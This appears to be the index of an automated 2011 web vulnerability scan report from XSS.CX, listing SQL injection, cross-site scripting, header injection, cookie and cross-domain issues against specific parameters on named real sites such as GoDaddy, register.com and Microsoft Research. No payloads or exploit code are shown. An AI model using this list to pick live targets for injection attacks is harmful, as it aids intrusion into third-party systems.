Stored XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Blind SQl Injection, 09032011-02

Report generated by XSS.CX at Sat Sep 03 18:34:40 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]

1.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [uit cookie]

1.3. http://t4.trackalyzer.com/trackalyze.asp [i parameter]

1.4. http://www.cheapssls.com/index.php [REST URL parameter 1]

1.5. http://www.cheapssls.com/index.php [Referer HTTP header]

1.6. http://www.cheapssls.com/index.php [Referer HTTP header]

1.7. http://www.cheapssls.com/index.php [User-Agent HTTP header]

1.8. http://www.cheapssls.com/index.php [User-Agent HTTP header]

1.9. http://www.cheapssls.com/index.php [__utmb cookie]

1.10. http://www.cheapssls.com/index.php [stat_uniq_code cookie]

1.11. https://www.cheapssls.com/index.php [User-Agent HTTP header]

1.12. https://www.cheapssls.com/index.php [sgTrackerUserId cookie]

1.13. https://www.cheapssls.com/index.php [ve%5Bbrowser%5D parameter]

1.14. https://www.cheapssls.com/index.php [ve%5Bbrowser_version%5D parameter]

1.15. https://www.cheapssls.com/index.php [ve%5Bclient_language%5D parameter]

1.16. https://www.cheapssls.com/index.php [ve%5Bos%5D parameter]

1.17. https://www.cheapssls.com/index.php [ve%5Burl%5D parameter]

1.18. http://www.godaddy.com/gdshop/offers/cross_sell.asp [ASPSESSIONIDACSTCQTS cookie]

1.19. http://www.microcad.ca/cart/add/ [productid parameter]

1.20. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 [REST URL parameter 3]

2. Cross-site scripting (stored)

3. HTTP header injection

3.1. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2]

3.2. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3]

3.3. http://www.wunderground.com/dotset.php [id parameter]

3.4. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

4. Cross-site scripting (reflected)

4.1. http://feeds.feedburner.com/~s/meetup [i parameter]

4.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

4.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

4.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

4.5. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mbox parameter]

4.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mboxId parameter]

4.7. http://s29.sitemeter.com/js/counter.asp [site parameter]

4.8. http://s29.sitemeter.com/js/counter.js [site parameter]

4.9. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]

4.10. http://www.meetup.com/api/ [method parameter]

4.11. http://www.microcad.ca/cart/add/ [productid parameter]

4.12. http://www.register.com/css/home-optimized.css [REST URL parameter 1]

4.13. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1]

4.14. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2]

4.15. http://www.register.com/favicon.ico [REST URL parameter 1]

4.16. http://www.register.com/font/vag-bold.ttf [REST URL parameter 1]

4.17. http://www.register.com/font/vag-bold.woff [REST URL parameter 1]

4.18. http://www.register.com/images/sn/hp.xml [REST URL parameter 1]

4.19. http://www.register.com/js/aop-attach.js [REST URL parameter 1]

4.20. http://www.register.com/js/homepage-optimized.js [REST URL parameter 1]

4.21. http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

4.22. http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1]

4.23. http://www.typepad.com/services/toolbar [autofollowed parameter]

4.24. http://www.register.com/ [Referer HTTP header]

4.25. http://www.register.com/domain/searchresults.rcmx [Referer HTTP header]

4.26. http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header]

5. Flash cross-domain policy

5.1. http://adx.adnxs.com/crossdomain.xml

5.2. http://ajax.googleapis.com/crossdomain.xml

5.3. http://bh.contextweb.com/crossdomain.xml

5.4. http://c.mouseflow.com/crossdomain.xml

5.5. http://c7.zedo.com/crossdomain.xml

5.6. http://cspix.media6degrees.com/crossdomain.xml

5.7. http://d.adroll.com/crossdomain.xml

5.8. http://d3.zedo.com/crossdomain.xml

5.9. http://d7.zedo.com/crossdomain.xml

5.10. http://ib.adnxs.com/crossdomain.xml

5.11. http://idcs.interclick.com/crossdomain.xml

5.12. http://imagesak.securepaynet.net/crossdomain.xml

5.13. http://img1.wsimg.com/crossdomain.xml

5.14. http://img3.wsimg.com/crossdomain.xml

5.15. http://m.adnxs.com/crossdomain.xml

5.16. http://registercom.tt.omtrdc.net/crossdomain.xml

5.17. http://s.gravatar.com/crossdomain.xml

5.18. http://segment-pixel.invitemedia.com/crossdomain.xml

5.19. http://value.register.com/crossdomain.xml

5.20. http://www.wunderground.com/crossdomain.xml

5.21. http://ads.lfstmedia.com/crossdomain.xml

5.22. http://edge.sharethis.com/crossdomain.xml

5.23. http://login.dotomi.com/crossdomain.xml

5.24. http://pagead2.googlesyndication.com/crossdomain.xml

5.25. http://w.sharethis.com/crossdomain.xml

5.26. http://www.godaddy.com/crossdomain.xml

5.27. https://www.godaddy.com/crossdomain.xml

5.28. http://www.youtube-nocookie.com/crossdomain.xml

5.29. http://stats.wordpress.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://stats.wordpress.com/clientaccesspolicy.xml

6.2. http://value.register.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://vasco.com/login.aspx

7.2. http://vasco.com/user_registration.aspx

8. Session token in URL

8.1. http://bh.contextweb.com/bh/set.aspx

8.2. http://l.sharethis.com/pview

8.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

8.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

8.5. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard

8.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard

8.7. http://research.microsoft.com/en-us/about/awards.aspx

8.8. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

8.9. http://research.microsoft.com/en-us/um/people/ymwang/

8.10. http://www.facebook.com/extern/login_status.php

8.11. http://www.meetup.com/api/

8.12. http://www.register.com/css/home-optimized.css

8.13. http://www.register.com/js/aop-attach.js

8.14. http://www.register.com/js/homepage-optimized.js

8.15. http://www.register.com/js/jquery-1.3.2.min.js

9. ASP.NET ViewState without MAC enabled

9.1. https://www.sslmatrix.com/Order/quickorder

9.2. https://www.sslmatrix.com/ssl-promotion-code

9.3. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

10. Cookie scoped to parent domain

10.1. http://api.twitter.com/1/statuses/media_timeline.json

10.2. http://api.twitter.com/1/statuses/user_timeline.json

10.3. http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json

10.4. http://api.twitter.com/1/statuses/user_timeline/SharePoint.json

10.5. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

10.6. http://api.twitter.com/1/trends/1.json

10.7. http://api.twitter.com/1/trends/available.json

10.8. http://api.twitter.com/1/urls/resolve.json

10.9. http://api.twitter.com/1/users/search.json

10.10. http://api.twitter.com/i/search/image_facets.json

10.11. http://api.twitter.com/i/search/video_facets.json

10.12. http://login.dotomi.com/ucm/UCMController

10.13. http://www.cheapssls.com/

10.14. http://www.cheapssls.com/index.php

10.15. http://adx.adnxs.com/mapuid

10.16. http://am.trafficmp.com/a/bpix

10.17. http://am.trafficmp.com/a/bpix

10.18. http://api.flickr.com/clientaccesspolicy.xml

10.19. http://b.scorecardresearch.com/b

10.20. http://b.scorecardresearch.com/r

10.21. http://bh.contextweb.com/bh/set.aspx

10.22. http://c7.zedo.com/img/bh.gif

10.23. https://cart.godaddy.com/basket.aspx

10.24. http://cf.addthis.com/red/p.json

10.25. http://cf.addthis.com/red/usync

10.26. http://cspix.media6degrees.com/orbserv/hbpix

10.27. http://d7.zedo.com/img/bh.gif

10.28. http://d7.zedo.com/img/bh.gif

10.29. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

10.30. http://ib.adnxs.com/getuid

10.31. http://ib.adnxs.com/seg

10.32. http://ib.adnxs.com/setuid

10.33. http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif

10.34. http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif

10.35. http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif

10.36. http://idcs.interclick.com/Segment.aspx

10.37. https://idp.godaddy.com/login.aspx

10.38. https://idp.godaddy.com/retrieveaccount.aspx

10.39. http://image2.pubmatic.com/AdServer/Pug

10.40. http://img.godaddy.com/image.aspx

10.41. http://img.godaddy.com/pageevents.aspx

10.42. http://m.adnxs.com/msftcookiehandler

10.43. https://mya.godaddy.com/

10.44. https://mya.godaddy.com/products/accountlist.aspx

10.45. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

10.46. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

10.47. http://pixel.adblade.com/imps.php

10.48. http://pixel.mathtag.com/event/img

10.49. http://pixel.mathtag.com/event/js

10.50. http://pixel.rubiconproject.com/tap.php

10.51. http://pixel.rubiconproject.com/tap.php

10.52. http://r.openx.net/set

10.53. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

10.54. http://segment-pixel.invitemedia.com/set_partner_uid

10.55. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

10.56. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

10.57. http://static.getclicky.com/js

10.58. http://www.godaddy.com/Payment/payment-options.aspx

10.59. http://www.godaddy.com/affiliates/affiliate-program.aspx

10.60. http://www.godaddy.com/gdshop/offers/cross_sell.asp

10.61. http://www.godaddy.com/shared/video/videos.aspx

10.62. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

10.63. http://www.godaddy.com/ssl/ssl-certificates.aspx

10.64. http://www.register.com/css/basic.css

10.65. http://www.register.com/css/titan-screen.css

10.66. http://www.register.com/imgs/global/crtIcon.gif

10.67. http://www.register.com/imgs/global/registerLogo.gif

10.68. http://www.register.com/js/aop-attach.js

10.69. http://www.register.com/js/global.js

10.70. http://www.register.com/js/jquery-1.3.2.min.js

10.71. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js

10.72. http://www.register.com/js/jquery.cookie.js

10.73. http://www.register.com/js/jquery.jcarousellite.js

10.74. http://www.register.com/js/mbox.js

10.75. http://www.register.com/js/nicejforms.js

10.76. http://www.register.com/js/s_code.js

10.77. http://www.register.com/js/thickbox.js

11. Cookie without HttpOnly flag set

11.1. http://img.godaddy.com/image.aspx

11.2. http://img.godaddy.com/pageevents.aspx

11.3. http://login.dotomi.com/ucm/UCMController

11.4. http://www.cheapssls.com/

11.5. http://www.cheapssls.com/index.php

11.6. http://www.register.com/

11.7. http://www.register.com/domain/searchresults.rcmx

11.8. http://ad.yieldmanager.com/pixel

11.9. http://am.trafficmp.com/a/bpix

11.10. http://am.trafficmp.com/a/bpix

11.11. http://api.flickr.com/clientaccesspolicy.xml

11.12. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json

11.13. http://b.scorecardresearch.com/b

11.14. http://b.scorecardresearch.com/r

11.15. http://bh.contextweb.com/bh/set.aspx

11.16. http://c7.zedo.com/img/bh.gif

11.17. https://cart.godaddy.com/basket.aspx

11.18. http://cf.addthis.com/red/p.json

11.19. http://cf.addthis.com/red/usync

11.20. http://community.research.microsoft.com/

11.21. http://cspix.media6degrees.com/orbserv/hbpix

11.22. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

11.23. http://d7.zedo.com/img/bh.gif

11.24. http://d7.zedo.com/img/bh.gif

11.25. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

11.26. http://idcs.interclick.com/Segment.aspx

11.27. https://idp.godaddy.com/login.aspx

11.28. https://idp.godaddy.com/retrieveaccount.aspx

11.29. http://image2.pubmatic.com/AdServer/Pug

11.30. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg

11.31. http://microsoftcambridge.com/Portals/0/portal.css

11.32. http://microsoftcambridge.com/Portals/0/rss.png

11.33. http://microsoftcambridge.com/Portals/0/search_results.png

11.34. http://microsoftcambridge.com/Portals/0/share_icons_new.png

11.35. http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css

11.36. http://microsoftcambridge.com/Portals/_default/default.css

11.37. http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js

11.38. http://microsoftcambridge.com/css/print.css

11.39. http://microsoftcambridge.com/css/styles.css

11.40. http://microsoftcambridge.com/img/working/about.png

11.41. http://microsoftcambridge.com/img/working/blog.png

11.42. http://microsoftcambridge.com/img/working/community.png

11.43. http://microsoftcambridge.com/img/working/events.png

11.44. http://microsoftcambridge.com/img/working/people.png

11.45. http://microsoftcambridge.com/img/working/teams.png

11.46. http://microsoftcambridge.com/img/working/working.png

11.47. http://microsoftcambridge.com/js/dnn.js

11.48. http://microsoftcambridge.com/js/dnn.xml.js

11.49. http://microsoftcambridge.com/js/dnn.xmlhttp.js

11.50. http://microsoftcambridge.com/js/dnncore.js

11.51. http://microsoftcambridge.com/js/jfeed.js

11.52. http://microsoftcambridge.com/js/jquery.js

11.53. http://microsoftcambridge.com/js/siteo.js

11.54. http://microsoftcambridge.com/js/twitter.min.js

11.55. http://microsoftcambridge.com/js/ui.js

11.56. https://mya.godaddy.com/

11.57. https://mya.godaddy.com/products/accountlist.aspx

11.58. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

11.59. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

11.60. http://pixel.adblade.com/imps.php

11.61. http://pixel.mathtag.com/event/img

11.62. http://pixel.mathtag.com/event/js

11.63. http://pixel.rubiconproject.com/tap.php

11.64. http://pixel.rubiconproject.com/tap.php

11.65. http://r.openx.net/set

11.66. http://research.microsoft.com/apps/search/search.ashx

11.67. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

11.68. http://segment-pixel.invitemedia.com/set_partner_uid

11.69. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

11.70. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

11.71. http://static.getclicky.com/js

11.72. http://t4.trackalyzer.com/trackalyze.asp

11.73. http://www.cheapssls.com/index.php

11.74. https://www.cheapssls.com/index.php

11.75. http://www.godaddy.com/Payment/payment-options.aspx

11.76. http://www.godaddy.com/affiliates/affiliate-program.aspx

11.77. http://www.godaddy.com/gdshop/offers/cross_sell.asp

11.78. http://www.godaddy.com/shared/video/videos.aspx

11.79. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx

11.80. http://www.godaddy.com/ssl/ssl-certificates.aspx

11.81. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc

11.82. http://www.register.com/css/basic.css

11.83. http://www.register.com/css/titan-screen.css

11.84. http://www.register.com/favicon.ico

11.85. http://www.register.com/imgs/global/btnChooseAPackage_on.gif

11.86. http://www.register.com/imgs/global/btnFindIt_on.gif

11.87. http://www.register.com/imgs/global/crtIcon.gif

11.88. http://www.register.com/imgs/global/registerLogo.gif

11.89. http://www.register.com/js/aop-attach.js

11.90. http://www.register.com/js/global.js

11.91. http://www.register.com/js/jquery-1.3.2.min.js

11.92. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js

11.93. http://www.register.com/js/jquery.cookie.js

11.94. http://www.register.com/js/jquery.jcarousellite.js

11.95. http://www.register.com/js/mbox.js

11.96. http://www.register.com/js/nicejforms.js

11.97. http://www.register.com/js/s_code.js

11.98. http://www.register.com/js/thickbox.js

12. Password field with autocomplete enabled

12.1. https://cart.godaddy.com/basket.aspx

12.2. https://idp.godaddy.com/login.aspx

12.3. https://idp.godaddy.com/login.aspx

12.4. https://idp.godaddy.com/login.aspx

12.5. https://idp.godaddy.com/login.aspx

12.6. https://idp.godaddy.com/login.aspx

12.7. https://idp.godaddy.com/login.aspx

12.8. https://idp.godaddy.com/login.aspx

12.9. https://idp.godaddy.com/retrieveaccount.aspx

12.10. https://idp.godaddy.com/retrieveaccount.aspx

12.11. http://twitter.com/

12.12. http://twitter.com/

12.13. http://twitter.com/

12.14. http://vasco.com/login.aspx

12.15. http://vasco.com/user_registration.aspx

12.16. https://www.cheapssls.com/index.php

12.17. http://www.godaddy.com/Payment/payment-options.aspx

12.18. http://www.godaddy.com/affiliates/affiliate-program.aspx

12.19. http://www.godaddy.com/gdshop/offers/cross_sell.asp

12.20. http://www.godaddy.com/ssl/ssl-certificates.aspx

12.21. http://www.godaddy.com/ssl/ssl-certificates.aspx

12.22. http://www.meetup.com/

12.23. http://www.meetup.com/

12.24. http://www.meetup.com/Boston-BizSpark-Meetup/

12.25. http://www.meetup.com/Boston-BizSpark-Meetup/

12.26. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/

12.27. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/

12.28. http://www.meetup.com/sponsorships/

12.29. http://www.meetup.com/sponsorships/

12.30. http://www.meetup.com/whats_new/

12.31. http://www.meetup.com/whats_new/

12.32. https://www.microcad.ca/auth/login

12.33. https://www.sslmatrix.com/Order/quickorder

12.34. https://www.sslmatrix.com/Order/quickorder

12.35. https://www.sslmatrix.com/ssl-promotion-code

12.36. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

13. Source code disclosure

13.1. https://platform.linkedin.com/js/secureAnonymousFramework

13.2. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx

13.3. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx

13.4. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx

13.5. http://research.microsoft.com/en-us/um/people/yongrui/

13.6. http://vasco.com/

13.7. http://vasco.com/login.aspx

13.8. http://www.register.com/font/vag-bold.woff

13.9. http://www.vasco.com/

14. Referer-dependent response

14.1. http://fast.fonts.com/d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff

14.2. https://idp.godaddy.com/login.aspx

14.3. http://seal.digicert.com/custsupport/sealtable.php

14.4. http://www.cheapssls.com/

14.5. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html

14.6. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html

14.7. http://www.facebook.com/plugins/like.php

14.8. http://www.godaddy.com/shared/video/videos.aspx

14.9. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc

14.10. http://www.register.com/unauthenticated_session_expired.rcmx

15. Cross-domain POST

16. SSL cookie without secure flag set

16.1. https://cart.godaddy.com/basket.aspx

16.2. https://idp.godaddy.com/login.aspx

16.3. https://idp.godaddy.com/retrieveaccount.aspx

16.4. https://mya.godaddy.com/

16.5. https://mya.godaddy.com/products/accountlist.aspx

16.6. https://support.microsoft.com/contactus/emailcontact.aspx

16.7. https://www.cheapssls.com/index.php

16.8. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx

17. Cross-domain Referer leakage

17.1. http://assets.tumblr.com/iframe.html

17.2. https://careers.microsoft.com/Resumes.aspx

17.3. https://cart.godaddy.com/basket.aspx

17.4. http://cm.g.doubleclick.net/pixel

17.5. http://cm.g.doubleclick.net/pixel

17.6. http://dg.specificclick.net/

17.7. http://googleads.g.doubleclick.net/pagead/ads

17.8. http://googleads.g.doubleclick.net/pagead/ads

17.9. http://googleads.g.doubleclick.net/pagead/ads

17.10. http://googleads.g.doubleclick.net/pagead/ads

17.11. https://idp.godaddy.com/login.aspx

17.12. https://idp.godaddy.com/retrieveaccount.aspx

17.13. http://mediacdn.disqus.com/1314991730/build/system/disqus.js

17.14. http://microsoftcambridge.com/Search/tabid/722/Default.aspx

17.15. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.16. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.17. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.18. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.19. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.20. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3

17.21. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3

17.22. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

17.23. http://research.microsoft.com/Search

17.24. http://research.microsoft.com/apps/dp/search.aspx

17.25. http://research.microsoft.com/apps/pubs/default.aspx

17.26. http://research.microsoft.com/apps/search/videosearch.ashx

17.27. http://research.microsoft.com/apps/video/default.aspx

17.28. http://s7.addthis.com/js/250/addthis_widget.js

17.29. https://support.microsoft.com/contactus/emailcontact.aspx

17.30. http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx

17.31. http://www.cheapssls.com/

17.32. http://www.cheapssls.com/index.php

17.33. https://www.cheapssls.com/

17.34. https://www.cheapssls.com/index.php

17.35. https://www.cheapssls.com/index.php

17.36. http://www.diginotar.com/SearchResults/tabid/37/Default.aspx

17.37. http://www.godaddy.com/Payment/payment-options.aspx

17.38. http://www.godaddy.com/gdshop/offers/cross_sell.asp

17.39. http://www.godaddy.com/ssl/ssl-certificates.aspx

17.40. http://www.google.com/maps

17.41. http://www.google.com/search

17.42. http://www.google.com/search

17.43. http://www.google.com/url

17.44. http://www.google.com/url

17.45. http://www.google.com/url

17.46. http://www.google.com/url

17.47. http://www.google.com/url

17.48. http://www.google.com/url

17.49. http://www.google.com/url

17.50. http://www.google.com/url

17.51. http://www.google.com/url

17.52. http://www.google.com/url

17.53. http://www.hostnj.net/

17.54. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

17.55. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

17.56. http://www.microsoft-careers.com/search

17.57. https://www.microsoft-careers.com/find.job

17.58. https://www.microsoft-careers.com/talentcommunity/subscribe/

17.59. http://www.register.com/domain/searchresults.rcmx

17.60. http://www.register.com/unauthenticated_session_expired.rcmx

17.61. https://www.sslmatrix.com/Order/quickorder

18. Cross-domain script include

18.1. http://assets.tumblr.com/iframe.html

18.2. https://cart.godaddy.com/basket.aspx

18.3. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

18.4. http://geom2.com/

18.5. http://googleads.g.doubleclick.net/pagead/ads

18.6. http://googleads.g.doubleclick.net/pagead/ads

18.7. https://idp.godaddy.com/login.aspx

18.8. https://idp.godaddy.com/retrieveaccount.aspx

18.9. http://meetupblog.meetup.com/

18.10. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

18.11. http://research.microsoft.com/Search

18.12. http://research.microsoft.com/apps/dp/areas.aspx

18.13. http://research.microsoft.com/apps/dp/blank.jpg

18.14. http://research.microsoft.com/apps/dp/dl/downloads.aspx

18.15. http://research.microsoft.com/apps/dp/downloads.aspx

18.16. http://research.microsoft.com/apps/dp/ev/events.aspx

18.17. http://research.microsoft.com/apps/dp/gr/groups.aspx

18.18. http://research.microsoft.com/apps/dp/groups.aspx

18.19. http://research.microsoft.com/apps/dp/i/reverse_

18.20. http://research.microsoft.com/apps/dp/ne/news.aspx

18.21. http://research.microsoft.com/apps/dp/news.aspx

18.22. http://research.microsoft.com/apps/dp/pe/people.aspx

18.23. http://research.microsoft.com/apps/dp/pr/projects.aspx

18.24. http://research.microsoft.com/apps/dp/projects.aspx

18.25. http://research.microsoft.com/apps/dp/pu/publications.aspx

18.26. http://research.microsoft.com/apps/dp/search.aspx

18.27. http://research.microsoft.com/apps/dp/vi/videos.aspx

18.28. http://research.microsoft.com/apps/pubs/default.aspx

18.29. http://research.microsoft.com/apps/search/videosearch.ashx

18.30. http://research.microsoft.com/apps/video/default.aspx

18.31. http://research.microsoft.com/en-us/about/awards.aspx

18.32. http://research.microsoft.com/en-us/about/brochure-1.aspx

18.33. http://research.microsoft.com/en-us/about/brochure-2.aspx

18.34. http://research.microsoft.com/en-us/about/brochure-3.aspx

18.35. http://research.microsoft.com/en-us/about/brochure-4.aspx

18.36. http://research.microsoft.com/en-us/about/brochure-5.aspx

18.37. http://research.microsoft.com/en-us/about/brochure-6.aspx

18.38. http://research.microsoft.com/en-us/about/brochure-7.aspx

18.39. http://research.microsoft.com/en-us/about/brochure-8.aspx

18.40. http://research.microsoft.com/en-us/about/brochure-9.aspx

18.41. http://research.microsoft.com/en-us/about/contactus.aspx

18.42. http://research.microsoft.com/en-us/about/default.aspx

18.43. http://research.microsoft.com/en-us/about/directors.aspx

18.44. http://research.microsoft.com/en-us/about/feature/downloads.aspx

18.45. http://research.microsoft.com/en-us/about/paperawards.aspx

18.46. http://research.microsoft.com/en-us/collaboration/about/default.aspx

18.47. http://research.microsoft.com/en-us/collaboration/about/events.aspx

18.48. http://research.microsoft.com/en-us/collaboration/about/projects.aspx

18.49. http://research.microsoft.com/en-us/collaboration/about/summits.aspx

18.50. http://research.microsoft.com/en-us/collaboration/awards/default.aspx

18.51. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx

18.52. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx

18.53. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx

18.54. http://research.microsoft.com/en-us/collaboration/bg_txt.png

18.55. http://research.microsoft.com/en-us/collaboration/default.aspx

18.56. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx

18.57. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx

18.58. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx

18.59. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx

18.60. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx

18.61. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx

18.62. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx

18.63. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx

18.64. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx

18.65. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx

18.66. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx

18.67. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx

18.68. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx

18.69. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx

18.70. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx

18.71. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx

18.72. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx

18.73. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx

18.74. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx

18.75. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx

18.76. http://research.microsoft.com/en-us/collaboration/tools/default.aspx

18.77. http://research.microsoft.com/en-us/community/default.aspx

18.78. http://research.microsoft.com/en-us/default.aspx

18.79. http://research.microsoft.com/en-us/events/escience2011/

18.80. http://research.microsoft.com/en-us/events/indiaschooljune2011/

18.81. http://research.microsoft.com/en-us/events/women-in-computing2011/

18.82. http://research.microsoft.com/en-us/jobs/default.aspx

18.83. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx

18.84. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx

18.85. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx

18.86. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx

18.87. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx

